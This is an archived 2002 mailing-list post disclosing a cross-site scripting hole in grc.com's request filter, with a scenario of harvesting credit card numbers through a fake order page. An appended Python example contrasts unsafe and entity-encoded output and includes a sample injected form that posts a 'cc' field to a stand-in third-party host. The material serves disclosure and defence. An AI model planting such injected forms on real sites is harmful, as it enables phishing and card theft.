This was discovered last February and listed at: http://pointblanksecurity.com/css/

> Wednesday, May 01, 2002
>
> The following represents a classic [fitting] working example of the
> dangers of Cross Site Scripting.
>
> [see: http://www.cert.org/advisories/CA-2000-02.html
> http://www.cert.org/archive/pdf/cross_site_scripting.pdf]
>
> Gibson Research Corporation http://www.grc.com is an interesting site
> covering a wide variety of security topics for newcomers. Cursory
> research suggests that it enjoys a substantial loyal following who
> trust it implicitly.
>
> The problem is two-fold:
>
> 1. The site has a web based discussion forum
> 2. The site has a custom 'filter', the so-called: "Gibson Research
> Corporation's IIS Advanced Prophylactic Filter"
>
> This custom 'filter' is supposed to protect the server
> from 'malicious abuse' and both 'detect and block' invalid requests
> submitted to the server:
>
> http://www.grc.com/apf/
>
> [screen shot: http://www.malware.com/flitty.png 25KB]
>
> Unfortunately, what it actually does is allow us to inject our own
> html code through grc.com's secured server. This is particularly
> ticklish as it does not take much to conjure up a scenario where we
> construct a 'fake' e-commerce page, say peddling a book or 'gadget'
> download and simply invite the loyal following to go and submit their
> credit card details to our custom form.
>
> The site grc.com is well known and trusted. The page is on a secured
> server with valid certificates.
>
> Ripe For Picking™
>
> Crude Working example:
>
> note: custom crafted for Internet Explorer 5.5 and 6
>
> http://www.malware.com/grc.html
>
> [screen shot: http://www.malware.com/lucre.png 11KB]
>
> Notes:
>
> 1. Watch where you "point and click". It's all smoke and mirrors out
> there.
> 2. 3 mail messages within 72 hours to support @ grc.com remain
> unanswered to date.
>
>
> End Call
>
> --
> http://www.malware.com
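The post describes the generic reflected cross-site scripting pattern: a trusted server echoes request data back into a page unencoded, so markup supplied in the URL (here, a fake order form) is rendered under the trusted site's name and certificate. The following is an added illustration written for this archive, not code from the post, from grc.com or from the filter it names; it assumes a hypothetical page that greets the visitor by a `name` query parameter, and the injected form markup and the hostnames in it are constructed sample values. It shows the echo done unsafely, the same echo with HTML-entity encoding for the text-node context, and a cheap response-side check that flags tags the template itself does not emit.

```python
"""Reflected XSS, vulnerable versus encoded output, with a response-side check.
Constructed example; the page, parameter name and sample input are assumptions."""
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# The page's own template; the only tags it should ever emit are these.
PAGE_TEMPLATE = "<html><body><p>Hello, {name}!</p></body></html>"
TEMPLATE_TAGS = {"html", "body", "p"}

# Constructed sample of attacker-controlled input: a form that would send
# whatever the visitor types to a third-party host if the markup were live.
INJECTED_MARKUP = (
    '<form action="https://third-party.example/collect">'
    '<input name="cc"></form>'
)


def example_url():
    """Build the kind of link a visitor might be sent (constructed host)."""
    return "https://trusted-site.example/greet?name=" + quote(INJECTED_MARKUP)


def query_param(url, key):
    """Return the first value of a query parameter, or '' if it is absent."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get(key, [""])[0]


def render_unsafe(url):
    """Vulnerable: the request value is concatenated straight into the HTML."""
    return PAGE_TEMPLATE.format(name=query_param(url, "name"))


def render_safe(url):
    """Hardened: the value is entity-encoded for the HTML text-node context,
    so '<', '>', '&' and quotes reach the browser as inert characters."""
    return PAGE_TEMPLATE.format(name=html.escape(query_param(url, "name"), quote=True))


def contains_unexpected_tags(rendered, allowed=TEMPLATE_TAGS):
    """True if the rendered page carries any tag name outside the template's
    own set, i.e. untrusted markup made it into the response."""
    found = {m.lower() for m in re.findall(r"<\s*/?\s*([A-Za-z][A-Za-z0-9]*)", rendered)}
    return not found <= allowed


if __name__ == "__main__":
    url = example_url()
    print("unsafe flagged:", contains_unexpected_tags(render_unsafe(url)))
    print("safe flagged:  ", contains_unexpected_tags(render_safe(url)))
```

The point of the last function is that a request-side "filter" of the kind the post mentions cannot substitute for encoding at output time: the check runs on what the server is about to send, and any tag the template did not produce is evidence that untrusted input was rendered as markup rather than as text.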
This archive was generated by hypermail 2b30 : Thu May 02 2002 - 13:35:35 PDT